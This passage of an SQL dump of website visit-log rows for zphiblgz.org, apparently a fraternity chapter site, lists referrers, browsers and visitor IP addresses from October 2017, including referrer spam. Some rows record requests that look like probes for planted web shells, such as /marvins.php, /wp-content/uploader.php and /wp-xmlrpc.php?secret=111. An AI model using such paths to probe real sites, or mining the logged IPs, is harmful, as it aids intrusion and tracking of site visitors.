,0),(12588,'2017-10-12','http://www.zphiblgz.org/','Firefox','Windows','27.0','','82.80.249.192','000',6,0),(12589,'2017-10-12','http://www.zphiblgz.org/','Safari','Macintosh','6.1.1','','82.80.249.192','000',7,0),(12590,'2017-10-12','http://www.zphiblgz.org/','Chrome','Macintosh','31.0.1650.57','','82.80.249.192','000',5,0),(12591,'2017-10-12','http://www.zphiblgz.org/','Chrome','Windows','40.0.2214.111','','82.80.249.192','000',2,0),(12592,'2017-10-12','http://www.zphiblgz.org/','Chrome','Linux','31.0.1650.63','','82.80.249.192','000',2,0),(12593,'2017-10-12','http://www.zphiblgz.org/','Chrome','Macintosh','31.0.1650.63','','82.80.249.192','000',5,0),(12594,'2017-10-12','http://www.zphiblgz.org/','Safari','Macintosh','5.1.9','','82.80.249.192','000',1,0),(12595,'2017-10-12','http://www.zphiblgz.org/','Firefox','Windows','25.0','','82.80.249.192','000',1,0),(12596,'2017-10-12','http://www.zphiblgz.org/','Firefox','Windows','24.0','','82.80.249.192','000',2,0),(12597,'2017-10-12','http://www.zphiblgz.org/','Firefox','Macintosh','26.0','','82.80.249.192','000',6,0),(12598,'2017-10-12','http://zphiblgz.org/scholarship/','Firefox','Linux','26.0','','82.80.249.192','000',3,0),(12599,'2017-10-12','http://zphiblgz.org/scholarship/','Chrome','Windows','32.0.1700.72','','82.80.249.192','000',3,0),(12600,'2017-10-12','http://zphiblgz.org/scholarship/','Chrome','Windows','31.0.1650.63','','82.80.249.192','000',9,0),(12601,'2017-10-12','http://zphiblgz.org/service/','MSIE','Windows','10.0','','82.80.249.192','000',4,0),(12602,'2017-10-12','http://zphiblgz.org/service/','Chrome','Macintosh','32.0.1700.68','','82.80.249.192','000',2,0),(12603,'2017-10-12','http://zphiblgz.org/service/','Firefox','Windows','36.0','','82.80.249.192','000',2,0),(12604,'2017-10-12','http://zphiblgz.org/event/breakfast-on-the-go/','Chrome','Windows','12.0.742.91','','82.80.249.192','000',2,0),(12605,'2017-10-12','http://zphiblgz.org/author/przphiblgz-org/','Safari','Macintosh','7.0.1','','82.80.249.192','000',1,0),(12606,'2017-10-12','http://zphiblgz.org/author/przphiblgz-org/','Safari','Macintosh','6.1','','82.80.249.192','000',4,0),(12607,'2017-10-12','http://zphiblgz.org/author/przphiblgz-org/','Firefox','Windows','26.0','','82.80.249.192','000',2,0),(12608,'2017-10-12','http://zphiblgz.org/author/przphiblgz-org/page/2/','MSIE','Windows','9.0','','82.80.249.192','000',1,0),(12609,'2017-10-12','http://zphiblgz.org/cause/marchofdimes-2/','Firefox','Macintosh','25.0','','82.80.249.192','000',1,0),(12610,'2017-10-12','http://zphiblgz.org/cause/marchofdimes-2/','Unknown','Unknown','Unknown','','82.80.249.192','000',1,0),(12611,'2017-10-12','http://zphiblgz.org','MSIE','Windows','7.0','','153.167.148.42','000',2,0),(12612,'2017-10-12','https://www.google.com.tw/','Chrome','Windows','61.0.3163.100','','36.224.223.39','000',2,0),(12613,'2017-10-12','http://www.sribno.net/','Unknown','Unknown','Unknown','','188.163.74.19','000',3,0),(12614,'2017-10-12','https://vsdshnik.com/','MSIE','Windows','6.0','','178.137.177.108','000',3,0),(12615,'2017-10-12','http://moskva.nodup.ru/','Unknown','Unknown','Unknown','','37.115.191.27','000',1,0),(12616,'2017-10-12','http://zphiblgz.org/marvins.php','Chrome','Windows','5.0.375.99','','192.185.12.245','000',2,0),(12617,'2017-10-12','http://search.azby.fmworld.net/websearch/search?cflg=%E6%A4%9C%E7%B4%A2&select=94&chartype=&lang_all=&q=%E3%81%93%E3%81%9F%E3%81%A4+%E9%95%B7%E6%96%B9%E5%BD%A2+%E4%BA%BA%E6%84%9F%E3%82%BB%E3%83%B3%E3%82%B5%E3%83%BC+%2B%E6%89%8B%E5%85%83%E3%82%B3%E3%83%B3%E3%83%88%E3%83%AD%E3%83%BC%E3%83%A9%E3%83%BC&xargs=2&web.Unique=doc%2Chost+2&web.Format=&stpos=10&num=10','MSIE','Windows','11.0','','218.222.88.141','000',1,0),(12618,'2017-10-12','http://zphiblgz.org','MSIE','Windows','11.0','','219.136.75.181','000',1,0),(12619,'2017-10-12','http://zphiblgz.org/wp-inc.php','Chrome','Windows','5.0.375.99','','193.124.176.128','000',2,0),(12620,'2017-10-12','https://www.google.com/','Chrome','Android','61.0.3163.98','','66.87.80.138','000',1,0),(12621,'2017-10-12','http://zphiblgz.org/content-post.php','Chrome','Windows','5.0.375.99','','178.210.90.90','000',3,0),(12622,'2017-10-12','http://zphiblgz.org','SafeDNSBot','Unknown','Unknown','','95.85.10.130','000',5,0),(12623,'2017-10-12','http://life-instyle.com/eda.html','Opera','Windows','7.02','','46.118.159.224','000',1,0),(12624,'2017-10-12','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.108.186','000',2,0),(12625,'2017-10-12','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',2,0),(12626,'2017-10-12','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(12627,'2017-10-12','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','195.22.126.98','000',1,0),(12628,'2017-10-12','http://zphiblgz.org','curl','Unknown','7.38.0','','195.22.126.98','000',1,0),(12629,'2017-10-12','https://www.google.com/','Chrome','Windows','60.0.3112.113','','69.243.104.18','000',1,0),(12630,'2017-10-12','http://zphiblgz.org','Firefox','Windows','40.1','','223.237.19.172','000',2,0),(12631,'2017-10-12','74.220.219.51','Firefox','Windows','33.0','','162.243.69.215','000',1,0),(12632,'2017-10-12','http://zphiblgz.org','Firefox','Windows','33.0','','107.170.96.6','000',1,0),(12633,'2017-10-12','http://zphiblgz.org/content-post.php','Chrome','Windows','5.0.375.99','','89.42.216.113','000',2,0),(12634,'2017-10-12','http://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.49.215','000',1,0),(12635,'2017-10-12','http://zphiblgz.org','Chrome','Macintosh','27.0.1453.93','','46.161.9.4','000',1,0),(12636,'2017-10-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.121','000',1,0),(12637,'2017-10-12','http://x-lime.net/','MSIE','Windows','5.5','','188.163.74.19','000',3,0),(12638,'2017-10-12','http://videochat.mx/','MSIE','Windows','6.0','','37.115.189.113','000',2,0),(12639,'2017-10-12','http://www.muz-baza.net/','Opera','Windows','9.01','','188.163.74.19','000',3,0),(12640,'2017-10-12','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','104.250.198.128','000',2,0),(12641,'2017-10-12','http://rockprogblog.com/','MSIE','Windows','5.5','','37.115.189.113','000',3,0),(12642,'2017-10-12','http://www.google.com/','Chrome','Android','61.0.3163.98','','99.101.103.58','000',1,0),(12643,'2017-10-13','http://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',87,0),(12644,'2017-10-13','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.65','000',1,0),(12645,'2017-10-13','http://zphiblgz.org','Safari','iPhone','9.0','','117.88.106.69','000',1,0),(12646,'2017-10-13','http://zphiblgz.org','Safari','iPhone','9.0','','123.14.123.227','000',1,0),(12647,'2017-10-13','http://uptime-beta.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.137','000',1,0),(12648,'2017-10-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','188.214.104.146','000',2,0),(12649,'2017-10-13','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.10','000',2,0),(12650,'2017-10-13','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.116','000',1,0),(12651,'2017-10-13','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','195.22.126.98','000',1,0),(12652,'2017-10-13','http://zphiblgz.org','curl','Unknown','7.38.0','','195.22.126.98','000',1,0),(12653,'2017-10-13','http://zphiblgz.org','MSIE','Windows','6.0','','146.185.223.25','000',17,0),(12654,'2017-10-13','https://www.google.com/','Chrome','Windows','60.0.3112.113','','198.179.4.253','000',1,0),(12655,'2017-10-13','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.16','000',1,0),(12656,'2017-10-13','http://zphiblgz.org','Firefox','Windows','32.0','','217.182.192.197','000',1,0),(12657,'2017-10-13','zphiblgz.org','Firefox','Macintosh','16.0','','89.36.211.128','000',2,0),(12658,'2017-10-13','http://zphiblgz.org','Firefox','Linux','30.0','','50.202.38.3','000',2,0),(12659,'2017-10-13','http://cool-wedding.net/','MSIE','Windows','5.0','','46.118.159.224','000',1,0),(12660,'2017-10-13','http://x-lime.net/','MSIE','Windows','6.0','','37.115.191.27','000',3,0),(12661,'2017-10-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','162.247.72.217','000',1,0),(12662,'2017-10-13','http://zphiblgz.org/','Firefox','Windows','7.0.1','','195.22.126.178','000',1,0),(12663,'2017-10-13','http://zphiblgz.org','Chrome','Android','61.0.3163.98','','66.87.80.25','000',1,0),(12664,'2017-10-13','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.167','000',1,0),(12665,'2017-10-13','http://zphiblgz.org/wp-content/uploader.php','Chrome','Windows','42.0.2311.152','','163.172.255.139','000',1,0),(12666,'2017-10-13','http://zphiblgz.org','Firefox','Windows','220','','218.30.103.25','000',1,0),(12667,'2017-10-13','http://ivanovo.zrus.org/','MSIE','Windows','6.0','','46.118.159.224','000',3,0),(12668,'2017-10-13','http://pro-tec.kz/','Opera','Windows','6.01','','37.115.191.27','000',5,0),(12669,'2017-10-13','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(12670,'2017-10-13','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(12671,'2017-10-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.34.80.176','000',1,0),(12672,'2017-10-13','http://zphiblgz.org','python-requests','Unknown','2.14.2','','216.52.21.5','000',2,0),(12673,'2017-10-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.137.174','000',2,0),(12674,'2017-10-13','http://zphiblgz.org/','WordPress','Unknown','Unknown','','192.0.112.211','000',1,0),(12675,'2017-10-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','82.165.100.196','000',1,0),(12676,'2017-10-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','195.219.166.53','000',1,0),(12677,'2017-10-13','http://uptime-delta.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.147','000',1,0),(12678,'2017-10-13','http://search.smt.docomo.ne.jp/result?MT=2%E6%96%B9%E5%90%91%E5%B7%A5%E5%A0%B4%E6%89%87&SID=s08&SPAGE=1&UNIT=11&IND=010&PAGE=2&URANK=11&TPLID=01','Chrome','Android','60.0.3112.116','','49.98.173.227','000',1,0),(12679,'2017-10-13','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(12680,'2017-10-13','https://www.google.com/','Chrome','Macintosh','55.0.2883.75','','96.234.147.87','000',7,0),(12681,'2017-10-13','http://www.zphibmaryland.org/chapters/','Safari','iPhone','11.0','','107.77.241.5','000',5,0),(12682,'2017-10-13','http://lawyers.cafe/','MSIE','Windows','6.0','','178.137.177.108','000',2,0),(12683,'2017-10-13','http://www.sribno.net/','MSIE','Windows','6.0','','188.163.74.19','000',3,0),(12684,'2017-10-13','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.206','000',1,0),(12685,'2017-10-13','https://mega-polis.biz.ua/','MSIE','Windows','6.0','','37.115.189.113','000',2,0),(12686,'2017-10-14','http://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',166,0),(12687,'2017-10-14','http://zphiblgz.org/','Chrome','Windows','58.0.3029.110','','163.172.4.153','000',1,0),(12688,'2017-10-14','http://zphiblgz.org','Firefox','Windows','40.1','','92.86.27.58','000',5,0),(12689,'2017-10-14','zphiblgz.org','Chrome','Windows','50.0.2661.75','','149.202.70.53','000',2,0),(12690,'2017-10-14','http://zphiblgz.org','Firefox','Windows','40.1','','91.187.117.99','000',2,0),(12691,'2017-10-14','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.167','000',1,0),(12692,'2017-10-14','http://moskva.nodup.ru/','MSIE','Windows','7.0b','','37.115.191.27','000',1,0),(12693,'2017-10-14','http://zphiblgz.org','Safari','iPhone','9.0','','150.255.173.66','000',1,0),(12694,'2017-10-14','http://zphiblgz.org','Safari','iPhone','9.0','','112.66.103.59','000',1,0),(12695,'2017-10-14','http://zphiblgz.org/','Opera Next','Windows','43.0.2442.1144','','146.185.223.221','000',2,0),(12696,'2017-10-14','http://zphiblgz.org','Safari','iPhone','10.0','','69.143.35.179','000',2,0),(12697,'2017-10-14','http://zphiblgz.org','Firefox','Android','56.0','','126.12.238.166','000',2,0),(12698,'2017-10-14','http://uptime-alpha.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.153','000',1,0),(12699,'2017-10-14','http://zphiblgz.org','Safari','Unknown','8536.25','','212.47.239.73','000',34,0),(12700,'2017-10-14','http://pc-services.ru/','MSIE','Windows','6.0','','46.118.159.224','000',2,0),(12701,'2017-10-14','http://zphiblgz.org/wp-xmlrpc.php?secret=111','Chrome','Windows','42.0.2311.152','','163.172.255.139','000',1,0),(12702,'2017-10-14','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',3,0),(12703,'2017-10-14','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(12704,'2017-10-14','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','95.211.38.163','000',2,0),(12705,'2017-10-14','http://zphiblgz.org','curl','Unknown','7.54.1','','95.211.38.163','000',2,0),(12706,'2017-10-14','http://zphiblgz.org','MSIE','Windows','11.0','','46.229.170.197','000',1,0),(12707,'2017-10-14','http://zphiblgz.org','Chrome','Macintosh','57.0.2987.98','','46.229.170.197','000',1,0),(12708,'2017-10-14','http://zphiblgz.org','MSIE','Windows','7.0','','39.110.234.114','000',1,0),(12709,'2017-10-14','http://uptime-alpha.net/zphiblgz.org','Unknown','Unknown','Unknown','','67.215.230.90','000',1,0),(12710,'2017-10-14','http://zphiblgz.org/event/ms-walk-2017/','Chrome','Windows','58.0.3029.81','','146.185.223.150','000',4,0),(12711,'2017-10-14','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.102.23','000',1,0),(12712,'2017-10-14','http://zphiblgz.org','Firefox','Windows','29.0','','113.95.184.107','000',2,0),(12713,'2017-10-14','http://www.osnova3.ru/','MSIE','Windows','3.02','','37.115.189.113','000',1,0),(12714,'2017-10-14','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','185.191.204.12','000',4,0),(12715,'2017-10-14','https://landmania.ru/','MSIE','Windows','6.0','','37.115.189.113','000',1,0),(12716,'2017-10-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','38.140.244.18','000',1,0),(12717,'2017-10-14','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','74.85.220.183','000',1,0),(12718,'2017-10-14','http://zphiblgz.org','Faraday','Unknown','Unknown','','54.83.117.139','000',1,0),(12719,'2017-10-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','38.142.184.18','000',1,0),(12720,'2017-10-14','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','195.22.126.98','000',1,0),(12721,'2017-10-14','http://zphiblgz.org','Chrome','Windows','59.0.3071.115','','138.197.96.213','000',2,0),(12722,'2017-10-14','http://zphiblgz.org','Firefox','Windows','53.0','','18.220.38.114','000',2,0),(12723,'2017-10-14','http://www.zphibmaryland.org/chapters/','Safari','iPhone','11.0','','107.77.90.122','000',2,0),(12724,'2017-10-14','http://www.zphiblgz.org','Firefox','Linux','49.0','','138.197.64.76','000',3,0),(12725,'2017-10-14','http://zphiblgz.org','Firefox','Linux','54.0','','138.197.64.76','000',1,0),(12726,'2017-10-14','http://zphiblgz.org','Firefox','Windows','54.0','','138.197.64.76','000',1,0),(12727,'2017-10-14','http://zphiblgz.org','Chrome','Linux','59.0.3071.115','','138.197.64.76','000',2,0),(12728,'2017-10-14','http://zphiblgz.org','Opera Next','Macintosh','46.0.2597.57','','138.197.64.76','000',2,0),(12729,'2017-10-14','http://zphiblgz.org','Safari','Macintosh','10.0.3','','138.197.64.76','000',3,0),(12730,'2017-10-14','http://zphiblgz.org','MSIE','Windows','10.0','','138.197.64.76','000',2,0),(12731,'2017-10-14','http://zphiblgz.org','Chrome','Windows','59.0.3071.115','','138.197.64.76','000',1,0),(12732,'2017-10-14','http://zphiblgz.org','Chrome','Windows','60.0.3112.78','','138.197.64.76','000',1,0),(12733,'2017-10-14','http://www.zphiblgz.org','Firefox','Windows','54.0','','45.55.163.133','000',1,0),(12734,'2017-10-14','https://google.com','Firefox','Linux','26.0','','37.59.4.151','000',1,0),(12735,'2017-10-14','https://ilmexico.com/','MSIE','Windows','5.5','','37.115.189.113','000',1,0),(12736,'2017-10-14','http://zphiblgz.org/','Opera Next','Windows','46.0.2597.39','','46.161.9.3','000',1,0),(12737,'2017-10-14','http://zphiblgz.org/','Opera','Windows','12.17','','46.161.9.3','000',2,0),(12738,'2017-10-15','zphiblgz.org','Firefox','Macintosh','16.0','','188.165.193.197','000',2,0),(12739,'2017-10-15','http://zphiblgz.org/','Opera Next','Windows','20.0.1387.64','','155.133.82.107','000',2,0),(12740,'2017-10-15','http://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',63,0),(12741,'2017-10-15','http://deshevo-nedorogo.ru/','Opera','Windows','8.01','','46.118.159.224','000',2,0),(12742,'2017-10-15','zphiblgz.org','Chrome','Windows','50.0.2661.75','','37.187.77.211','000',5,0),(12743,'2017-10-15','http://zphiblgz.org','MSIE','Windows','7.0','','39.110.234.114','000',5,0),(12744,'2017-10-15','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','95.211.38.163','000',1,0),(12745,'2017-10-15','http://zphiblgz.org','curl','Unknown','7.54.1','','95.211.38.163','000',1,0),(12746,'2017-10-15','http://zphiblgz.org','Firefox','Windows','40.1','','186.42.161.194','000',2,0),(12747,'2017-10-15','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.24','000',1,0),(12748,'2017-10-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.8.100','000',2,0),(12749,'2017-10-15','http://ivanovo.zrus.org/','MSIE','Windows','6.0','','46.118.159.224','000',1,0),(12750,'2017-10-15','http://zphiblgz.org','Chrome','Macintosh','40.0.2214.93','','54.241.155.9','000',1,0),(12751,'2017-10-15','http://zphiblgz.org','Safari','iPhone','10.0','','69.143.35.179','000',4,0),(12752,'2017-10-15','http://zphiblgz.org','Chrome','Macintosh','50.0.2661.102','','54.153.67.66','000',17,0),(12753,'2017-10-15','http://komputers-best.ru/','Unknown','Unknown','Unknown','','37.115.191.27','000',2,0),(12754,'2017-10-15','https://xn----7sbbahaq9bb5afgiqfliv4m.xn--p1ai/','MSIE','Windows','5.5','','37.115.191.27','000',3,0),(12755,'2017-10-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.151.250','000',1,0),(12756,'2017-10-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','80.67.172.162','000',1,0),(12757,'2017-10-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.38.14.215','000',1,0),(12758,'2017-10-15','http://zphiblgz.org/','Firefox','Windows','7.0.1','','163.172.212.115','000',1,0),(12759,'2017-10-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.163.1.11','000',1,0),(12760,'2017-10-15','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(12761,'2017-10-15','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',1,0),(12762,'2017-10-15','http://zphiblgz.org','Firefox','Windows','40.1','','181.26.26.116','000',2,0),(12763,'2017-10-15','http://zphiblgz.org','Safari','iPhone','10.0','','174.205.5.149','000',2,0),(12764,'2017-10-15','http://zphiblgz.org','Chrome','Windows','61.0.3163.100','','71.179.18.191','000',8,0),(12765,'2017-10-15','http://uptime-delta.net/zphiblgz.org','Unknown','Unknown','Unknown','','67.215.230.83','000',1,0),(12766,'2017-10-15','http://zphiblgz.org','CATExplorador','Unknown','1.0beta','','45.32.144.70','000',2,0),(12767,'2017-10-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.79.107','000',1,0),(12768,'2017-10-15','https://yes-com.com/','MSIE','Windows','6.0','','188.163.74.19','000',6,0),(12769,'2017-10-15','http://zphiblgz.org','Chrome','Android','61.0.3163.98','','73.132.243.51','000',6,0),(12770,'2017-10-15','https://klumba55.ru/','MSIE','Windows','6.0','','178.137.177.108','000',3,0),(12771,'2017-10-15','https://mega-polis.biz.ua/','Opera','Windows','8.01','','37.115.189.113','000',2,0),(12772,'2017-10-15','http://www.google.com/url?sa=t&rct=j&q=zphiblgz.org&source=web&cd=5&ved=0CF0QFjAE&url=http:%2F%2Fzphiblgz.org%2F&cad=rja','Lynx','Unknown','2.8.5rel.1','','78.158.11.226','000',1,0),(12773,'2017-10-15','http://lm.facebook.com/l.php?u=http%3A%2F%2Fzphiblgz.org%2F&h=ATO00ws7mdOdVEa48qbPKtJjeZ00CcxDJbcwKbdqqOPyeohL1ZXZS9K2B4KK1mUlI4BD8pdBU6XYVtpfK8zxzkO51GaMDKjGUT4-umQ2Hwc3SnriNFAiIHvQR-gDFQ63','Chrome','iPhone','61.0.3163.73','','100.15.160.57','000',1,0),(12774,'2017-10-15','http://zphiblgz.org','Firefox','Macintosh','31.0','','23.254.20.189','000',2,0),(12775,'2017-10-15','http://zphiblgz.org','Firefox','Windows','46.0','','192.126.140.212','000',1,0),(12776,'2017-10-15','http://zphiblgz.org','Firefox','Windows','46.0','','192.126.176.166','000',2,0),(12777,'2017-10-15','http://zphiblgz.org','Firefox','Windows','46.0','','185.189.37.82','000',2,0),(12778,'2017-10-15','http://grand-chlen.ru/','MSIE','Windows','6.0','','37.115.191.27','000',3,0),(12779,'2017-10-15','http://uptime-gamma.net/zphiblgz.org','Unknown','Unknown','Unknown','','173.234.234.203','000',1,0),(12780,'2017-10-16','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.167','000',2,0),(12781,'2017-10-16','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.14','000',1,0),(12782,'2017-10-16','https://kiskinhouse.com/','Opera','Windows','8.01','','46.118.159.224','000',2,0),(12783,'2017-10-16','http://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',87,0),(12784,'2017-10-16','http://zphiblgz.org','MSIE','Windows','7.0','','39.110.234.114','000',3,0),(12785,'2017-10-16','http://spravka-medosmotr.ru/','MSIE','Windows','6.0','','37.115.191.27','000',3,0),(12786,'2017-10-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','208.67.1.79','000',1,0),(12787,'2017-10-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.46.49','000',2,0),(12788,'2017-10-16','http://zphiblgz.org/history/','Chrome','Android','61.0.3163.98','','73.132.243.51','000',3,0),(12789,'2017-10-16','https://univerfiles.com/','MSIE','Windows','6.0','','46.118.159.224','000',1,0),(12790,'2017-10-16','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','86.123.194.13','000',1,0),(12791,'2017-10-16','http://zphiblgz.org','Safari','iPhone','10.0','','69.143.35.179','000',1,0),(12792,'2017-10-16','http://www.zphibmaryland.org/chapters/','Chrome','Android','61.0.3163.98','','166.137.240.17','000',7,0),(12793,'2017-10-16','http://zphiblgz.org','Chrome','Windows','61.0.3163.100','','150.148.14.162','000',4,0),(12794,'2017-10-16','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.15','000',2,0),(12795,'2017-10-16','http://uptime-alpha.net/zphiblgz.org','Unknown','Unknown','Unknown','','67.215.230.90','000',1,0),(12796,'2017-10-16','http://zphiblgz.org','Firefox','Windows','40.1','','78.186.25.6','000',2,0),(12797,'2017-10-16','http://zphiblgz.org','Firefox','Windows','18.0','','144.76.71.83','000',1,0),(12798,'2017-10-16','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(12799,'2017-10-16','http://videochat.mx/','MSIE','Windows','6.0','','37.115.189.113','000',8,0),(12800,'2017-10-16','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',3,0),(12801,'2017-10-16','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',1,0),(12802,'2017-10-16','zphiblgz.org','Chrome','Windows','50.0.2661.75','','89.36.211.128','000',1,0),(12803,'2017-10-16','http://zphiblgz.org','Chrome','Windows','52.0.2743.116','','192.99.67.13','000',17,0),(12804,'2017-10-16','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.79','000',1,0),(12805,'2017-10-16','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','104.166.88.75','000',3,0),(12806,'2017-10-16','http://lerporn.info/','MSIE','Windows','6.0','','188.163.74.19','000',2,0),(12807,'2017-10-16','http://l.instagram.com/','Chrome','Android','61.0.3163.98','','69.242.16.138','000',2,0),(12808,'2017-10-16','http://zphiblgz.org/history/','Chrome','Android','61.0.3163.98','','71.244.137.250','000',3,0),(12809,'2017-10-16','http://deshevo-nedorogo.ru/','Unknown','Unknown','Unknown','','46.118.159.224','000',1,0),(12810,'2017-10-16','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.69.27.211','000',19,0),(12811,'2017-10-16','http://zphiblgz.org','Chrome','Android','45.0.2454.94','','158.69.27.211','000',1,0),(12812,'2017-10-16','https://www.google.com/','Chrome','Macintosh','55.0.2883.75','','96.234.147.87','000',18,0),(12813,'2017-10-16','http://zphiblgz.org','Firefox','Macintosh','54.0','','50.112.202.202','000',1,0),(12814,'2017-10-16','http://zphiblgz.org','MSIE','Windows','7.0','','118.238.252.172','000',1,0),(12815,'2017-10-16','http://zphiblgz.org','Firefox','Windows','40.1','','182.179.158.182','000',2,0),(12816,'2017-10-17','http://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',88,0),(12817,'2017-10-17','http://kirov.zrus.org/','MSIE','Windows','6.0','','46.118.159.224','000',3,0),(12818,'2017-10-17','http://zphiblgz.org','Firefox','Windows','40.1','','202.150.104.47','000',2,0),(12819,'2017-10-17','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','95.211.38.163','000',2,0),(12820,'2017-10-17','http://zphiblgz.org','curl','Unknown','7.54.1','','95.211.38.163','000',2,0),(12821,'2017-10-17','zphiblgz.org','Firefox','Macintosh','16.0','','133.242.54.221','000',2,0),(12822,'2017-10-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.166','000',1,0),(12823,'2017-10-17','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(12824,'2017-10-17','http://zphiblgz.org/history/','Chrome','Android','61.0.3163.98','','174.204.0.110','000',4,0),(12825,'2017-10-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','212.47.246.21','000',2,0),(12826,'2017-10-17','http://int.search.myway.com/search/GGweb.jhtml?p2=%5EBSB%5Exdm077%5ELMJAJP%5Ejp&ptb=0D7FD845-68B3-41EE-8462-827399C649F3&n=783A3E27&ind=&cn=JP&ln=ja&si=CMT019eX_NUCFVoKKgodEg4PpA&tpr=hpsb&trs=wtt&brwsid=474f2604-e8bb-4259-a6fd-b4d41f7b987c&st=tab&searchfor=%E5%8D%98%E7%9B%B8200V%E3%80%80%E9%9B%BB%E6%B0%97%E6%9A%96%E6%88%BF%E6%A9%9F&pn=4&ots=1508235689233','MSIE','Windows','11.0','','121.119.161.113','000',1,0),(12827,'2017-10-17','http://uptime-gamma.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.138','000',1,0),(12828,'2017-10-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','87.118.115.176','000',1,0),(12829,'2017-10-17','http://zphiblgz.org','Unknown','Unknown','Unknown','','98.126.152.195','000',1,0),(12830,'2017-10-17','http://zphiblgz.org','Firefox','Windows','51.0','','77.75.126.223','000',1,0),(12831,'2017-10-17','http://zphiblgz.org','Firefox','Windows','34.0','','89.28.167.23','000',2,0),(12832,'2017-10-17','https://voloo.ru/','MSIE','Windows','6.0','','37.115.191.27','000',1,0),(12833,'2017-10-17','http://uptime-gamma.net/zphiblgz.org','Unknown','Unknown','Unknown','','67.215.230.93','000',1,0),(12834,'2017-10-17','http://zphiblgz.org','Unknown','Unknown','Unknown','','67.215.230.90','000',1,0),(12835,'2017-10-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.234.157.254','000',4,0),(12836,'2017-10-17','http://search.smt.docomo.ne.jp/result?MT=%E3%81%93%E3%81%9F%E3%81%A4+%E3%83%AD%E3%83%B3%E3%83%89&SID=s08&SPAGE=1&UNIT=11&IND=000&PAGE=2&URANK=11&TPLID=01','Chrome','Android','61.0.3163.98','','118.111.207.171','000',1,0),(12837,'2017-10-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','207.244.70.35','000',1,0),(12838,'2017-10-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','54.36.81.57','000',2,0),(12839,'2017-10-17','http://uptime-delta.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.147','000',1,0),(12840,'2017-10-17','https://klumba55.ru/','MSIE','Windows','6.0','','178.137.177.108','000',1,0),(12841,'2017-10-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.10.104.243','000',1,0),(12842,'2017-10-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.199.130.188','000',1,0),(12843,'2017-10-17','http://zp